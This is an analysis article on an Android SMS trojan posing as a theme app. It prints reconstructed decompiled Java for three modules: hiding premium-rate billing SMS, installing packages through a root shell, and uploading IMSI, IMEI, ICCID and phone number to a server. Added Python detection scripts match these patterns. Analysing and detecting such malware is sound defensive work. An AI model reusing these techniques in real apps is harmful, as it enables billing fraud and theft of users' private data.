Android Trojan Analysis and Development
Author: mangel
I. Introduction to Android trojans
Android is more open than the iPhone: it allows third-party applications to be installed, including ones that were never approved for Google's Android Market, but that openness also seems to raise the security risk. Malware-infected applications have been found in Android Market itself; as on a PC, users can reduce the exposure by installing anti-virus software.
II. Overview
Once installed, the program presents itself as a desktop theme that can also set wallpapers.
When run it obtains root privileges and downloads and installs packages without asking. It sends premium-rate SMS to subscribe to SP (service provider) services and intercepts the billing confirmation that comes back, so the user's credit is drained without any visible trace. It also harvests the contact list and other private data and uploads them to a server.
III. Sample characteristics
1. Sensitive permissions
    android.provider.Telephony.SMS_RECEIVED
Strictly speaking this is the broadcast action the receiver registers for, not a permission: receiving it requires android.permission.RECEIVE_SMS, and the subscription messages need SEND_SMS. For abortBroadcast() to hide a message, the receiver has to be declared with a higher android:priority than the stock SMS application, because SMS_RECEIVED was delivered as an ordered broadcast on the Android versions this sample targets. From Android 4.4 the default SMS app receives SMS_DELIVER instead, and aborting SMS_RECEIVED no longer suppresses delivery.
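As an added example that is not part of the original article, the following Python script checks an AndroidManifest.xml for exactly this setup: a receiver filtering on SMS_RECEIVED with a raised android:priority, combined with the SMS, phone-state, contacts and INTERNET permissions the sample needs. Both manifests are constructed for the demonstration; the package, receiver and service names are assumptions, not values taken from the sample.

```python
"""Manifest triage for the SMS-interception setup described above.
Added example, not code from the article or from the sample."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest modelled on what this sample needs; package, receiver
# and service names are assumptions.
TROJAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.theme">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Theme">
    <receiver android:name=".MyReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <service android:name=".MyService"/>
  </application>
</manifest>
"""

# Constructed plain SMS notifier: listens at default priority and cannot send.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notifier">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application>
    <receiver android:name=".SmsListener">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def aattr(el, name):
    """Read an android:-namespaced attribute."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def sms_receivers(manifest_xml):
    """[(receiver name, priority)] for receivers that filter on SMS_RECEIVED;
    priority is 0 when the filter does not set one (the platform default)."""
    root = ET.fromstring(manifest_xml)
    found = []
    for rcv in root.iter("receiver"):
        for flt in rcv.findall("intent-filter"):
            if SMS_RECEIVED in [aattr(a, "name") for a in flt.findall("action")]:
                prio = aattr(flt, "priority")
                found.append((aattr(rcv, "name"), int(prio) if prio else 0))
    return found


def permissions(manifest_xml):
    root = ET.fromstring(manifest_xml)
    return {aattr(p, "name") for p in root.findall("uses-permission")}


def assess(manifest_xml):
    """List the capability combinations that make this sample work."""
    perms = permissions(manifest_xml)
    findings = []
    for name, prio in sms_receivers(manifest_xml):
        # abortBroadcast() only hides a message if this receiver runs before
        # the stock SMS app, i.e. with a higher priority in the ordered broadcast.
        if prio > 0 and "android.permission.RECEIVE_SMS" in perms:
            findings.append("%s: SMS_RECEIVED at priority %d, can abortBroadcast() "
                            "before the SMS app" % (name, prio))
    if {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS"} <= perms:
        findings.append("SEND_SMS+RECEIVE_SMS: can order SP services and hide the replies")
    ident = {"android.permission.READ_PHONE_STATE", "android.permission.READ_CONTACTS"} & perms
    if ident and "android.permission.INTERNET" in perms:
        findings.append("identity data (%s) plus INTERNET: upload possible"
                        % ", ".join(sorted(p.rsplit(".", 1)[1] for p in ident)))
    return findings


if __name__ == "__main__":
    for label, m in (("trojan", TROJAN_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, sms_receivers(m), assess(m) or "no findings")
```

The priority check is deliberately the first thing the script looks at: a receiver on SMS_RECEIVED by itself is normal for any SMS utility, and it is the raised priority together with RECEIVE_SMS that turns it into an interception primitive.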
2. Entry point and malicious modules
    // The broadcast receiver is the entry point of the malicious code.
    public class MyReceiver extends BroadcastReceiver { ... }
(1) Sending and intercepting SMS:
    // Reconstructed from the decompiler output (methods of MyReceiver).
    // The receiver only acts on SMS_RECEIVED; the standard PDU extraction
    // is not in the excerpt and is filled in here.
    @Override
    public void onReceive(Context context, Intent intent) {
        if (!intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
            return;
        }
        Object[] pdus = (Object[]) intent.getExtras().get("pdus");
        for (Object pdu : pdus) {
            SmsMessage msg = SmsMessage.createFromPdu((byte[]) pdu);
            String from = msg.getOriginatingAddress();
            String body = msg.getMessageBody();
            // Sender 10658166 is the SP gateway; the body keywords match
            // billing confirmations ("customer service", "tariff", "1.00 yuan",
            // "2.00 yuan", "yuan/message", "yuan/use").
            if (from.contains("10658166") || body.contains("83589523")
                    || body.contains("客服") || body.contains("资费")
                    || body.contains("1.00元") || body.contains("2.00元")
                    || body.contains("元/条") || body.contains("元/次")) {
                abortBroadcast();  // the user's SMS app never sees the message
            }
        }
    }

    // Replies to the originating address of an intercepted message. The
    // message parts (localArrayList5 in the decompiled code) and the sent
    // PendingIntents are built outside this excerpt; the string
    // "android.setting.SMS_SENT" sits next to the send call in the decompiled code.
    private void sendReply(SmsMessage msg, ArrayList<String> parts,
                           ArrayList<PendingIntent> sentIntents) {
        String sentAction = "android.setting.SMS_SENT";
        try {
            SmsManager sms = SmsManager.getDefault();
            sms.sendMultipartTextMessage(msg.getOriginatingAddress(), null,
                    parts, sentIntents, null);
        } catch (Exception e) {
            // swallowed in the sample
        }
    }
(2) Obtaining root, installing and uninstalling packages:
    // Reconstructed. Installs an APK from the app's private files directory
    // through a root shell. "sudo" is not part of Android; this only works
    // where a root toolkit provides a sudo wrapper, so on an unrooted device
    // the install step silently fails.
    private void installApk(String paramString1, String apkName) {
        try {
            File filesDir = mContext.getFilesDir();
            String cmd = "sudo pm install -r " + filesDir + "/" + apkName;
            Process p = Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            // ignored in the sample
        }
    }

    // installAPK() is also declared in the class; its body is not in the excerpt.
    private void installAPK() { ... }

    // Removes the root helper package and hands control to MyService.
    // Note that -r is an install option; pm uninstall does not take it, so
    // on a stock pm this command is rejected.
    private void uninstallPlugin() {
        try {
            Log.d("agui", "uninstall");
            Process p = Runtime.getRuntime().exec("pm uninstall -r com.newline.root");
            Intent run = new Intent("android.intent.action.RUN");
            run.setClass(mContext, MyService.class);
            mContext.startService(run);
        } catch (IOException e) {
            // ignored in the sample
        }
    }
(3) Stealing and uploading private data:
    // Reconstructed. Collects device and subscriber identifiers into a
    // Hashtable and posts them to the server URL (paramString1) on a
    // background thread via NetTask. str1..str7 are computed earlier in the
    // method and are not in the excerpt.
    private void upload(String paramString1, String paramString2,
                        IResponseListener paramIResponseListener) {
        Hashtable<String, String> fields = new Hashtable<String, String>();
        fields.put("id", Long.toString(System.currentTimeMillis()));
        fields.put("imsi", str4);    // subscriber identity
        fields.put("imei", str5);    // device identity
        fields.put("iccid", str6);   // SIM serial
        fields.put("mobile", str7);  // phone number
        fields.put("ctime", TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"));
        fields.put("osver", "1");
        fields.put("cver", "010101");
        fields.put("uid", str1);
        fields.put("bid", str2);
        fields.put("pid", str3);
        fields.put("softid", paramString2);
        // The decompiler names the anonymous callback MessageService$4; it
        // wraps the caller's IResponseListener.
        NetTask task = new NetTask(fields, "utf-8", 0,
                new MessageService.4(this, paramIResponseListener));
        task.execute(new String[] { paramString1 });
    }

    // NetTask wraps the HTTP request in an AsyncTask; the response body is
    // accumulated in a StringBuffer and handed to the listener. Only the
    // fragment below survives in the excerpt.
    public class NetTask extends AsyncTask {
        ...
        String response = responseBuffer.toString();
    }
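Added example, not code from the article or from the sample: a small static-triage script in Python that scans decompiled Java for the three indicator families shown in (1) to (3) and reports a family only when all of its indicators co-occur, so an ordinary SMS app that merely listens for SMS_RECEIVED is not flagged. The decompiled text it runs on is constructed to resemble the excerpts above; the TelephonyManager getters it looks for are an assumption about how the sample obtains the IMSI, IMEI and ICCID, which the excerpt does not show.

```python
"""Static triage of decompiled Android source for the indicator families in
this sample: SMS interception, package management through a root shell, and
device-identifier exfiltration. Added example, not code from the article."""
import re

# Constructed sample, modelled on the decompiled excerpts (not the real sample).
TROJAN_SOURCE = r'''
public class MyReceiver extends BroadcastReceiver {
  public void onReceive(Context ctx, Intent intent) {
    if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
      if (msg.getOriginatingAddress().contains("10658166")
          || msg.getMessageBody().contains("资费")
          || msg.getMessageBody().contains("元/条")) abortBroadcast();
    }
  }
  private void installApk(String name) {
    Runtime.getRuntime().exec("sudo pm install -r " + mContext.getFilesDir() + "/" + name);
  }
  private void report(String url) {
    Hashtable t = new Hashtable();
    t.put("imsi", tm.getSubscriberId());   // assumption: TelephonyManager source
    t.put("imei", tm.getDeviceId());
    t.put("iccid", tm.getSimSerialNumber());
    new NetTask(t, "utf-8", 0, cb).execute(url);
  }
}
'''

# Constructed legitimate SMS listener: same broadcast, but no abortBroadcast().
BENIGN_SOURCE = r'''
public class SmsListener extends BroadcastReceiver {
  public void onReceive(Context ctx, Intent intent) {
    if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
      showNotification(msg.getMessageBody());
    }
  }
}
'''

# Each family is a set of regexes that must ALL match somewhere in the source.
INDICATORS = {
    "sms_intercept": [
        r"android\.provider\.Telephony\.SMS_RECEIVED",
        r"\babortBroadcast\s*\(",
        r"getMessageBody\(\)\.contains\(",          # keyword filter on the body
    ],
    "root_pm_exec": [
        r"Runtime\.getRuntime\(\)\.exec\(",
        r"\bpm\s+(?:install|uninstall)\b",          # package manager from a shell
        r"\b(?:su|sudo)\b",                         # root wrapper
    ],
    "device_id_exfil": [
        r'"(?:imsi|imei|iccid)"',                   # field names sent to the server
        r"\bget(?:SubscriberId|DeviceId|SimSerialNumber)\(\)",
        r"\.execute\(",                             # AsyncTask upload
    ],
}


def find_indicators(source):
    """Return {family: {pattern: [1-based line numbers]}} for patterns that matched."""
    lines = source.splitlines()
    hits = {}
    for family, patterns in INDICATORS.items():
        hits[family] = {}
        for pat in patterns:
            rx = re.compile(pat)
            where = [n for n, line in enumerate(lines, 1) if rx.search(line)]
            if where:
                hits[family][pat] = where
    return hits


def families_triggered(hits):
    """AND logic: a family counts only when every one of its patterns matched."""
    return [f for f, pats in INDICATORS.items() if all(p in hits[f] for p in pats)]


def verdict(source):
    fams = families_triggered(find_indicators(source))
    if len(fams) >= 2:
        return "malicious"
    return "suspicious" if fams else "clean"


if __name__ == "__main__":
    for name, src in (("trojan", TROJAN_SOURCE), ("benign", BENIGN_SOURCE)):
        hits = find_indicators(src)
        print(name, verdict(src), families_triggered(hits))
        for fam, pats in hits.items():
            for pat, where in pats.items():
                print("  %-16s %-50s lines %s" % (fam, pat, where))
```

The line numbers returned by find_indicators() are the ones to open in the decompiler when confirming a hit; the AND rule per family keeps the false-positive rate down on apps that legitimately use one of the APIs, at the cost of missing samples that split a family across classes, which a real pipeline would handle by scanning the whole decompiled tree as one text.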